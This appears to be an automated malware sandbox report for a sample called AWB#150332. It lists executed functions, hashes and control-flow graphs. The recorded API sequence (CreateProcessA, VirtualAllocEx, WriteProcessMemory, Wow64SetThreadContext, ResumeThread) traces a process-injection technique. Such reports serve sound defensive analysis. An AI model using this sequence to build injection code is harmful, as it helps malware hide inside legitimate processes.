                                                                      execution_graph 37778 180d810 DuplicateHandle 37779 180d8a6 37778->37779 37874 753e1a0 37875 753e229 37874->37875 37875->37875 37876 753e38e CreateProcessA 37875->37876 37877 753e3eb 37876->37877 37756 180d5c8 37757 180d60e GetCurrentProcess 37756->37757 37759 180d660 GetCurrentThread 37757->37759 37761 180d659 37757->37761 37760 180d69d GetCurrentProcess 37759->37760 37762 180d696 37759->37762 37763 180d6d3 37760->37763 37761->37759 37762->37760 37764 180d6fb GetCurrentThreadId 37763->37764 37765 180d72c 37764->37765 37788 1804668 37789 180467a 37788->37789 37790 1804686 37789->37790 37794 1804779 37789->37794 37799 1803e1c 37790->37799 37792 18046a5 37795 180479d 37794->37795 37803 1804888 37795->37803 37807 1804878 37795->37807 37800 1803e27 37799->37800 37815 1805c5c 37800->37815 37802 180707e 37802->37792 37805 18048af 37803->37805 37804 180498c 37804->37804 37805->37804 37811 180449c 37805->37811 37809 1804888 37807->37809 37808 180498c 37808->37808 37809->37808 37810 180449c CreateActCtxA 37809->37810 37810->37808 37812 1805918 CreateActCtxA 37811->37812 37814 18059db 37812->37814 37816 1805c67 37815->37816 37819 1805c7c 37816->37819 37818 1807275 37818->37802 37820 1805c87 37819->37820 37823 1805cac 37820->37823 37822 180735a 37822->37818 37824 1805cb7 37823->37824 37827 1805cdc 37824->37827 37826 180744d 37826->37822 37828 1805ce7 37827->37828 37830 180874b 37828->37830 37833 180adf8 37828->37833 37829 1808789 37829->37826 37830->37829 37837 180cee9 37830->37837 37842 180ae30 37833->37842 37845 180ae1f 37833->37845 37834 180ae0e 37834->37830 37838 180cf19 37837->37838 37839 180cf3d 37838->37839 37854 180d097 37838->37854 37858 180d0a8 37838->37858 37839->37829 37849 180af19 37842->37849 37843 180ae3f 37843->37834 37846 180ae30 37845->37846 37848 180af19 GetModuleHandleW 37846->37848 37847 180ae3f 37847->37834 37848->37847 37850 180af5c 37849->37850 37851 180af39 37849->37851 37850->37843 37851->37850 37852 180b160 GetModuleHandleW 37851->37852 37853 180b18d 37852->37853 37853->37843 37855 180d0a8 37854->37855 37857 180d0ef 37855->37857 37862 180bc80 37855->37862 37857->37839 37859 180d0b5 37858->37859 37860 180bc80 GetModuleHandleW 37859->37860 37861 180d0ef 37859->37861 37860->37861 37861->37839 37863 180bc8b 37862->37863 37865 180de08 37863->37865 37866 180d2a4 37863->37866 37865->37865 37867 180d2af 37866->37867 37868 1805cdc GetModuleHandleW 37867->37868 37869 180de77 37868->37869 37869->37865 37766 7515d58 37767 7515da6 DrawTextExW 37766->37767 37769 7515dfe 37767->37769 37770 753df18 37771 753df60 WriteProcessMemory 37770->37771 37773 753dfb7 37771->37773 37774 753de58 37775 753de98 VirtualAllocEx 37774->37775 37777 753ded5 37775->37777 37780 753e008 37781 753e053 ReadProcessMemory 37780->37781 37783 753e097 37781->37783 37784 753d8c8 37785 753d908 ResumeThread 37784->37785 37787 753d939 37785->37787 37870 753d978 37871 753d9bd Wow64SetThreadContext 37870->37871 37873 753da05 37871->37873

                                                                      Executed Functions

                                                                      Function 075366AA Relevance: .1, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93c560d5bf557524e283a37b3a8351812bd583b8dc2a43518df3f099f9025602
                                                                      • Instruction ID: b11daee4c082cdd7ca02a5357699bfc04d738958d330d341eac85d948c095c1a
                                                                      • Opcode Fuzzy Hash: 93c560d5bf557524e283a37b3a8351812bd583b8dc2a43518df3f099f9025602
                                                                      • Instruction Fuzzy Hash: 83416FB1D046589FE714CF6AD9056EAFFF6FF8A201F04C0AAC408AB266DB314945CF51
                                                                      Function 07537F80 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 89c637e55da4813fcc68cb76f74c68df15ad76a85575c8ac342253fa39725724
                                                                      • Instruction ID: 5a1822de94ddb625abf97a8c51aa4f786c4fcfbb36f188644ffc23ce53aebb3c
                                                                      • Opcode Fuzzy Hash: 89c637e55da4813fcc68cb76f74c68df15ad76a85575c8ac342253fa39725724
                                                                      • Instruction Fuzzy Hash: EE2139B1D046588BEB18CFABC8157EEFBF6BF89300F04C46AD40866264DB751549CFA0
                                                                      Function 07537F90 Relevance: .1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 49343577ffb6fe9a84c7600801fbe4382b9c5c3058a7e33cd558c9bcf2a06743
                                                                      • Instruction ID: 93ca5b2f23a37737907b01a8e779636730e032cff5b8a42271a63688cb6d5e47
                                                                      • Opcode Fuzzy Hash: 49343577ffb6fe9a84c7600801fbe4382b9c5c3058a7e33cd558c9bcf2a06743
                                                                      • Instruction Fuzzy Hash: 4B21C4B1D006199BEB18CF9BC8457DEFBF6BFC9300F14C46AD409A6264DB75194A8FA0
                                                                      Function 0180D5B9 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 0180D646
                                                                      • GetCurrentThread.KERNEL32 ref: 0180D683
                                                                      • GetCurrentProcess.KERNEL32 ref: 0180D6C0
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0180D719
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: baa46eaaa482a41b84f9ec29d55a4d4f6510433189e93c674408c761a9b51cb9
                                                                      • Instruction ID: c3f58cbee874e9f9318f2ba931fa6f507646f23326fc0cb7b32ea5260fa93c66
                                                                      • Opcode Fuzzy Hash: baa46eaaa482a41b84f9ec29d55a4d4f6510433189e93c674408c761a9b51cb9
                                                                      • Instruction Fuzzy Hash: 635166B0D003098FEB54DFAAD948B9EBBF1EF88310F208519E419A73A0DB359945CF65
                                                                      Function 0180D5C8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 0180D646
                                                                      • GetCurrentThread.KERNEL32 ref: 0180D683
                                                                      • GetCurrentProcess.KERNEL32 ref: 0180D6C0
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0180D719
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: f535f4182ca989dc70e516170a588a84b8a1b53d50a8e23d4090bcda4e3935e4
                                                                      • Instruction ID: 7a2338b9416a6328f38208d068503ad835e6430b2723303de0a2f5a0ebdc795a
                                                                      • Opcode Fuzzy Hash: f535f4182ca989dc70e516170a588a84b8a1b53d50a8e23d4090bcda4e3935e4
                                                                      • Instruction Fuzzy Hash: 645167B09003098FEB54DFAAD948B9EBBF1EF88310F208119E419A73A0DB359945CF65
                                                                      Function 0753E194 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 72 753e194-753e235 76 753e237-753e241 72->76 77 753e26e-753e28e 72->77 76->77 78 753e243-753e245 76->78 84 753e290-753e29a 77->84 85 753e2c7-753e2f6 77->85 80 753e247-753e251 78->80 81 753e268-753e26b 78->81 82 753e253 80->82 83 753e255-753e264 80->83 81->77 82->83 83->83 86 753e266 83->86 84->85 87 753e29c-753e29e 84->87 91 753e2f8-753e302 85->91 92 753e32f-753e3e9 CreateProcessA 85->92 86->81 89 753e2c1-753e2c4 87->89 90 753e2a0-753e2aa 87->90 89->85 93 753e2ae-753e2bd 90->93 94 753e2ac 90->94 91->92 95 753e304-753e306 91->95 105 753e3f2-753e478 92->105 106 753e3eb-753e3f1 92->106 93->93 96 753e2bf 93->96 94->93 97 753e329-753e32c 95->97 98 753e308-753e312 95->98 96->89 97->92 100 753e316-753e325 98->100 101 753e314 98->101 100->100 102 753e327 100->102 101->100 102->97 116 753e47a-753e47e 105->116 117 753e488-753e48c 105->117 106->105 116->117 118 753e480 116->118 119 753e48e-753e492 117->119 120 753e49c-753e4a0 117->120 118->117 119->120 121 753e494 119->121 122 753e4a2-753e4a6 120->122 123 753e4b0-753e4b4 120->123 121->120 122->123 124 753e4a8 122->124 125 753e4c6-753e4cd 123->125 126 753e4b6-753e4bc 123->126 124->123 127 753e4e4 125->127 128 753e4cf-753e4de 125->128 126->125 130 753e4e5 127->130 128->127 130->130
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0753E3D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 91126722cd2f6e940bd891bce962d3b27c41a832e4e09a73ff6fe1c18ae7c386
                                                                      • Instruction ID: 80466abc6bcde47f3bf22ce239d46147f5892a0b4744350a5749db007ef875cf
                                                                      • Opcode Fuzzy Hash: 91126722cd2f6e940bd891bce962d3b27c41a832e4e09a73ff6fe1c18ae7c386
                                                                      • Instruction Fuzzy Hash: 51A13EB1D0071ACFEB24DF68C841BEDBBF1BB49310F14856AE848A7290DB759985CF91
                                                                      Function 0753E1A0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 131 753e1a0-753e235 133 753e237-753e241 131->133 134 753e26e-753e28e 131->134 133->134 135 753e243-753e245 133->135 141 753e290-753e29a 134->141 142 753e2c7-753e2f6 134->142 137 753e247-753e251 135->137 138 753e268-753e26b 135->138 139 753e253 137->139 140 753e255-753e264 137->140 138->134 139->140 140->140 143 753e266 140->143 141->142 144 753e29c-753e29e 141->144 148 753e2f8-753e302 142->148 149 753e32f-753e3e9 CreateProcessA 142->149 143->138 146 753e2c1-753e2c4 144->146 147 753e2a0-753e2aa 144->147 146->142 150 753e2ae-753e2bd 147->150 151 753e2ac 147->151 148->149 152 753e304-753e306 148->152 162 753e3f2-753e478 149->162 163 753e3eb-753e3f1 149->163 150->150 153 753e2bf 150->153 151->150 154 753e329-753e32c 152->154 155 753e308-753e312 152->155 153->146 154->149 157 753e316-753e325 155->157 158 753e314 155->158 157->157 159 753e327 157->159 158->157 159->154 173 753e47a-753e47e 162->173 174 753e488-753e48c 162->174 163->162 173->174 175 753e480 173->175 176 753e48e-753e492 174->176 177 753e49c-753e4a0 174->177 175->174 176->177 178 753e494 176->178 179 753e4a2-753e4a6 177->179 180 753e4b0-753e4b4 177->180 178->177 179->180 181 753e4a8 179->181 182 753e4c6-753e4cd 180->182 183 753e4b6-753e4bc 180->183 181->180 184 753e4e4 182->184 185 753e4cf-753e4de 182->185 183->182 187 753e4e5 184->187 185->184 187->187
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0753E3D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 33ad5b5a384a59e2d2e0409d0ed879938f805625f5add722d2266c623dea174d
                                                                      • Instruction ID: 6b771719ba05992a8284e71c49ebbb0acd24847b5e540bf762eb5333aa181a5b
                                                                      • Opcode Fuzzy Hash: 33ad5b5a384a59e2d2e0409d0ed879938f805625f5add722d2266c623dea174d
                                                                      • Instruction Fuzzy Hash: 2B912CB1D0071ACFEB24DF68C841BDDBBF2BB49310F14856AE848A7290DB759985CF91
                                                                      Function 0180AF19 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 188 180af19-180af37 189 180af63-180af67 188->189 190 180af39-180af46 call 18098a0 188->190 191 180af69-180af73 189->191 192 180af7b-180afbc 189->192 197 180af48 190->197 198 180af5c 190->198 191->192 199 180afc9-180afd7 192->199 200 180afbe-180afc6 192->200 243 180af4e call 180b1b0 197->243 244 180af4e call 180b1c0 197->244 198->189 201 180afd9-180afde 199->201 202 180affb-180affd 199->202 200->199 206 180afe0-180afe7 call 180a270 201->206 207 180afe9 201->207 205 180b000-180b007 202->205 203 180af54-180af56 203->198 204 180b098-180b158 203->204 238 180b160-180b18b GetModuleHandleW 204->238 239 180b15a-180b15d 204->239 209 180b014-180b01b 205->209 210 180b009-180b011 205->210 208 180afeb-180aff9 206->208 207->208 208->205 212 180b028-180b031 call 180a280 209->212 213 180b01d-180b025 209->213 210->209 219 180b033-180b03b 212->219 220 180b03e-180b043 212->220 213->212 219->220 221 180b061-180b06e 220->221 222 180b045-180b04c 220->222 228 180b070-180b08e 221->228 229 180b091-180b097 221->229 222->221 224 180b04e-180b05e call 180a290 call 180a2a0 222->224 224->221 228->229 240 180b194-180b1a8 238->240 241 180b18d-180b193 238->241 239->238 241->240 243->203 244->203
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0180B17E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 84aaef0ab29e9cac7bf1c1d1b6b08a7d3b16daabe26c6f95621f26507a740758
                                                                      • Instruction ID: 6d4b2f4df22b012486f0da61762dbfe55196481a08cb84a3ee755f77c795850c
                                                                      • Opcode Fuzzy Hash: 84aaef0ab29e9cac7bf1c1d1b6b08a7d3b16daabe26c6f95621f26507a740758
                                                                      • Instruction Fuzzy Hash: 6B814574A00B098FE766CF29D84075ABBF1BF48304F00892DD49AD7A90D735E94ACB91
                                                                      Function 0180449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 245 180449c-18059d9 CreateActCtxA 248 18059e2-1805a3c 245->248 249 18059db-18059e1 245->249 256 1805a4b-1805a4f 248->256 257 1805a3e-1805a41 248->257 249->248 258 1805a60 256->258 259 1805a51-1805a5d 256->259 257->256 261 1805a61 258->261 259->258 261->261
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 018059C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: ef0587d94d3f8a2112013612400d59df31ca9e00045c6bf9311355abbae55c14
                                                                      • Instruction ID: 7bf1150c27d3a09ab73e0bfe647d8ba231be6300225882bdae7bf6d85d396650
                                                                      • Opcode Fuzzy Hash: ef0587d94d3f8a2112013612400d59df31ca9e00045c6bf9311355abbae55c14
                                                                      • Instruction Fuzzy Hash: CA41D271C0071DCBDB25DFA9C884B9DBBB5BF49314F20816AD408AB251DB756A46CF90
                                                                      Function 0180590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 262 180590c-18059d9 CreateActCtxA 264 18059e2-1805a3c 262->264 265 18059db-18059e1 262->265 272 1805a4b-1805a4f 264->272 273 1805a3e-1805a41 264->273 265->264 274 1805a60 272->274 275 1805a51-1805a5d 272->275 273->272 277 1805a61 274->277 275->274 277->277
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 018059C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 83f3fa9e2af103354bc9c248b928810eff0d90a08913d0b889754add82fcd6df
                                                                      • Instruction ID: eaae8798c16d98153d3ce84e0faa85d38756f229f76080a140cc1a19af7bd1bc
                                                                      • Opcode Fuzzy Hash: 83f3fa9e2af103354bc9c248b928810eff0d90a08913d0b889754add82fcd6df
                                                                      • Instruction Fuzzy Hash: 7C41D071C0071DCFDB25CFA9C884B8DBBB1BF49314F20816AD408AB251DB756A46CF50
                                                                      Function 07515D50 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 278 7515d50-7515da4 280 7515da6-7515dac 278->280 281 7515daf-7515dbe 278->281 280->281 282 7515dc0 281->282 283 7515dc3-7515dfc DrawTextExW 281->283 282->283 284 7515e05-7515e22 283->284 285 7515dfe-7515e04 283->285 285->284
                                                                      APIs
                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07515DEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280056316.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7510000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: DrawText
                                                                      • String ID:
                                                                      • API String ID: 2175133113-0
                                                                      • Opcode ID: 926abe7314eee094dcf72bcf812cb4d51c241f9ac01fbd5ecf108f9d7024a09e
                                                                      • Instruction ID: 7c6b676ef25306ba2ff9520f263bae0b782ff06afb617f9adec672502fc708bc
                                                                      • Opcode Fuzzy Hash: 926abe7314eee094dcf72bcf812cb4d51c241f9ac01fbd5ecf108f9d7024a09e
                                                                      • Instruction Fuzzy Hash: F831E4B5D0030A9FDB10CF9AD884ADEFBF5FB48310F14842AE919A7210D775A945CFA4
                                                                      Function 0753DF10 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 288 753df10-753df66 290 753df76-753dfb5 WriteProcessMemory 288->290 291 753df68-753df74 288->291 293 753dfb7-753dfbd 290->293 294 753dfbe-753dfee 290->294 291->290 293->294
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0753DFA8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 5a4eb20df27df1f5a763c38afe62f5c5e12f5da35ced8c7f54a198b0cc88ec36
                                                                      • Instruction ID: 5395b2f5333251012f0b6a6d9bc7d03197601f58998d9be4663b836dc20fb101
                                                                      • Opcode Fuzzy Hash: 5a4eb20df27df1f5a763c38afe62f5c5e12f5da35ced8c7f54a198b0cc88ec36
                                                                      • Instruction Fuzzy Hash: CE2137B5D003499FDB10CFA9C885BEEBBF1FB48310F10842AE918A7250C7799941CBA4
                                                                      Function 07515D58 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 298 7515d58-7515da4 299 7515da6-7515dac 298->299 300 7515daf-7515dbe 298->300 299->300 301 7515dc0 300->301 302 7515dc3-7515dfc DrawTextExW 300->302 301->302 303 7515e05-7515e22 302->303 304 7515dfe-7515e04 302->304 304->303
                                                                      APIs
                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07515DEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280056316.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7510000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: DrawText
                                                                      • String ID:
                                                                      • API String ID: 2175133113-0
                                                                      • Opcode ID: 7feb2766d31a1a33cb255aa35c1537f79cf270090550f1bf08543d3dca573211
                                                                      • Instruction ID: 1bf8b18b0f2cbb4e172395c6a97d602dd6a8826b661563b2a7c4b0abaf27a8ec
                                                                      • Opcode Fuzzy Hash: 7feb2766d31a1a33cb255aa35c1537f79cf270090550f1bf08543d3dca573211
                                                                      • Instruction Fuzzy Hash: 2221C3B5D0030A9FDB10CF9AD884ADEFBF5FB48310F14842AE919A7210D775A955CFA4
                                                                      Function 0753E000 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 329 753e000-753e095 ReadProcessMemory 333 753e097-753e09d 329->333 334 753e09e-753e0ce 329->334 333->334
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0753E088
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 8d2eac37ba7a833e23e95c7b35a05b0cdc107e6e49cde02cc19c2f3e6220afaf
                                                                      • Instruction ID: 81c60326a56a28143f265649f29ba321d727869329fcd49c706053d91b45d78f
                                                                      • Opcode Fuzzy Hash: 8d2eac37ba7a833e23e95c7b35a05b0cdc107e6e49cde02cc19c2f3e6220afaf
                                                                      • Instruction Fuzzy Hash: E5213B71C003499FDB10DFAAD841BEEBBF5FF48320F50842AE918A7250C7799941CBA5
                                                                      Function 0753DF18 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 319 753df18-753df66 321 753df76-753dfb5 WriteProcessMemory 319->321 322 753df68-753df74 319->322 324 753dfb7-753dfbd 321->324 325 753dfbe-753dfee 321->325 322->321 324->325
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0753DFA8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 2a4201081692622dcb95711f81edf7a70916aa6f7376afd3f72fb4c51e6e42cd
                                                                      • Instruction ID: fef48b15f7802a480ab067c9e0c1b5ed6ba042cb118c16227ae87c4d145da573
                                                                      • Opcode Fuzzy Hash: 2a4201081692622dcb95711f81edf7a70916aa6f7376afd3f72fb4c51e6e42cd
                                                                      • Instruction Fuzzy Hash: 6D2127B5D003499FDB10DFAAC885BDEBBF5FF48310F10842AE918A7250C7799945CBA4
                                                                      Function 0753D970 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 307 753d970-753d9c3 310 753d9d3-753d9d6 307->310 311 753d9c5-753d9d1 307->311 312 753d9dd-753da03 Wow64SetThreadContext 310->312 311->310 313 753da05-753da0b 312->313 314 753da0c-753da3c 312->314 313->314
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0753D9F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 3954ba3b0cab66d41dc251cd04284faa3ba0b0fc89cf029dc768aff5d4cad253
                                                                      • Instruction ID: 90612c21ae785ade7884cbb6c704b75f19ecfafec5fb3f77a8975d812118b7f5
                                                                      • Opcode Fuzzy Hash: 3954ba3b0cab66d41dc251cd04284faa3ba0b0fc89cf029dc768aff5d4cad253
                                                                      • Instruction Fuzzy Hash: 262137B6D003098FDB10DFAAC4857EEBBF4EF48321F54842AD459A7240CB799985CFA5
                                                                      Function 0180D808 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 338 180d808-180d80a 339 180d810-180d8a4 DuplicateHandle 338->339 340 180d8a6-180d8ac 339->340 341 180d8ad-180d8ca 339->341 340->341
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0180D897
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 974925d0701968abc3b9d1d053e260de8a1769ea1faf2053c9abb74f3288bdf9
                                                                      • Instruction ID: 68d51a3da9558fca3ab81c33c7e5ebfbfa5fea9b3437963108ef2bf70bd5098a
                                                                      • Opcode Fuzzy Hash: 974925d0701968abc3b9d1d053e260de8a1769ea1faf2053c9abb74f3288bdf9
                                                                      • Instruction Fuzzy Hash: 2221E4B5D002099FDB10CF9AD885ADEFBF8EB48310F14841AE918A3350D779AA45CFA4
                                                                      Function 0753E008 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0753E088
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: f776010607f7793cc5d63196ca09d15dfca6663b962819b1845592cdc9a90bd8
                                                                      • Instruction ID: 2c5ff884a7ba07d224bf7d1ef1a1968305590520b7728501b91a9820c1ccc99e
                                                                      • Opcode Fuzzy Hash: f776010607f7793cc5d63196ca09d15dfca6663b962819b1845592cdc9a90bd8
